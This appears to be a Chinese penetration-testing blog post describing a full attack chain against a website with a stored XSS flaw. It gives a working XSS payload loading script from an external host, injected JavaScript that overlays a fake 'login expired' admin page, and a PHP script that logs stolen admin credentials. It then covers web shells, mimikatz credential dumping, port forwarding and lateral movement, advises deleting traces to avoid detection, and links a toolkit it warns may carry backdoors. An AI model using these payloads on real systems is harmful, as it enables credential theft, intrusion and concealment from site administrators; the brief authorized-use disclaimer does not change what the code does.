i春秋作家：jasonx

原文來自：一個xss漏洞到內網漫遊【送多年心血打造的大禮包啦！】

前言

滲透過程中，有時候遇某些網站，明明檢測到有xss漏洞，但是盲打以後，收到的cookie還是不能登入後臺，大多數的原因都是因為對方的cookie關鍵引數開啟了httponly，導致你獲取到的cookie引數不全，所以沒法登入。

今天和大家分享一次繞過httponly拿後臺的思路。

0x01 遇到一個存在xss的站點

這個站點在提交訂單的時候，下面有個訂單備註輸入框存在儲存型xss。
我們直接插入插入xss程式碼；

</textarea>'"><script src=https://xx.cc/x/7Zbi58></script>

過了沒多久拿到了cookie

但是我們嘗試用cookie登入的時候失敗了。

那麼問題來了，如何才能拿到後臺呢？

0x02 xss釣魚拿下後臺

因為xss平臺已經收到後臺的url地址了。
那麼我們直接訪問這個後臺地址，然後右鍵檢視原始碼。

然後把所有程式碼複製到我們新建的一個html檔案裡面。
修改裡面的程式碼,把所有相對路徑的地方，全部改成絕對路徑，(啥意思呢？請看下面分析。)

比如裡面有的連結是這樣的 /index.php
我們要修改成被釣魚的域名加上/index.php
改完後應該是這樣的 http://被釣魚的域名.com/index.php

注意：所有相對路徑連結部分都要改。

然後我們把action=這裡修改成我們的1.php檔案地址（原始碼在下面）
<form action="http://www.我們的php域名.com/1.php" method="post" class="login-form">

1.php原始碼如下

<?php 
$str=''; 
$str.='name:'.$_POST['name'].'|'; 
$str.='pwd:'.$_POST['pwd'].'|'; 
$str.='ip:'.$_SERVER["REMOTE_ADDR"].'|'; 
$str.='time:'.date("m-d-h:i"); 
file_put_contents('log.txt',$str.PHP_EOL, FILE_APPEND); 
#下面這行的意思是記錄完賬號密碼以後跳轉到他原來的後臺地址。
header("location:https://www.baidu.com/admin.php");
?> 
 

注意：你的html檔案裡面的使用者名稱和密碼的引數名稱要對應1.php的修改。
name=的這裡，要和1.php的對應，要不然接收不到賬號密碼。

1.php的後面新增上被釣魚方的後臺首頁地址，成功拿到密碼以後會自動跳回他後臺首頁。

接下來我們把這個html檔案和1.php放到網站空間，直接phpstudy搭建一個也可以的。

現在去xss平臺新建一個專案
名稱什麼的隨便輸入，在自定義程式碼處輸入以下程式碼。
把其中的url地址修改成你的html地址。

setTimeout(function(){
alert("登陸過期，請重新登陸！");
parent.document.writeln("<iframe style=\"margin:0px;padding:0px;height:100%;width:100%;\" src=\"https:\/\/我的釣魚域名.com/index.html\" frameBorder=0 scrolling=no></iframe>");
setTimeout(function(){
document.getElementsByTagName("body")[0].setAttribute("style","margin:2px;");},100);
setTimeout(function(){
parent.document.getElementsByTagName("body")[0].setAttribute("style","margin:0px;");},100);
},1500);

我們把得到的xss地址複製下來，插入到訂單備註裡面。
管理員看到我們的訂單以後，1.5秒後就會自動彈出“登入過期，請重新登陸”的提示，並在url不改變的情況下，跳轉到我們偽造的登入頁面上去了。

接下來只要管理員輸入了賬號密碼，並且提交，那麼我們釣魚伺服器就收到賬號密碼啦，管理員那邊也正常跳轉到他的後臺。

注意：拿到賬號密碼以後請迅速刪掉你的xss專案，要不然管理員那邊每一次瀏覽你的訂單都會跳出這個登入頁面，避免被發現。
另外實際操作的時候，你可以修改下程式碼，比如判斷是否登入成功，或者修改延時等等，我這只是提供一個思路，拋磚引玉吧。

然後我們用拿到的賬號密碼登入後臺，找上傳點getshell。

拿到shell以後我們用 mimikatz（咪咪卡住）獲取管理員密碼。
然後通過ipconfig看到對方伺服器在內網，所以我們需要轉發端口出來，這裡方法很多了，lcx轉發 ngrok等等都可以的。

轉發出來我們用獲取到的密碼直接登入伺服器。
先收集一波內網資訊。

net view 列出工作組下的計算機名稱。
arp -a 檢視arp快取表。

然後就是橫向懟了。

附上釣魚的演示原始碼
連結: https://pan.baidu.com/s/1VrvYXLy4ozXN-8iR7Uj7rA 提取碼: giu3

∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷ 華麗的分割線 ∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷

以上都不是重點，重點是我要放出自己用了多年的【滲透工具包】啦。
裡面的很多工具都是一點點收集來的，因為都是來源於網際網路，部分工具可能存在後門，請大家下載以後自行查殺，部分批量的工具過於敏感就不放出來啦。

宣告：

工具是一把刀，既能切菜，也能傷人，我分享的初衷是便於大家做授權的滲透測試，所以請不要用於非法用途，否則一切後果自負。

閱讀原文即可下載滲透工具包

原文地址：一個xss漏洞到內網漫遊【送多年心血打造的大禮包啦！】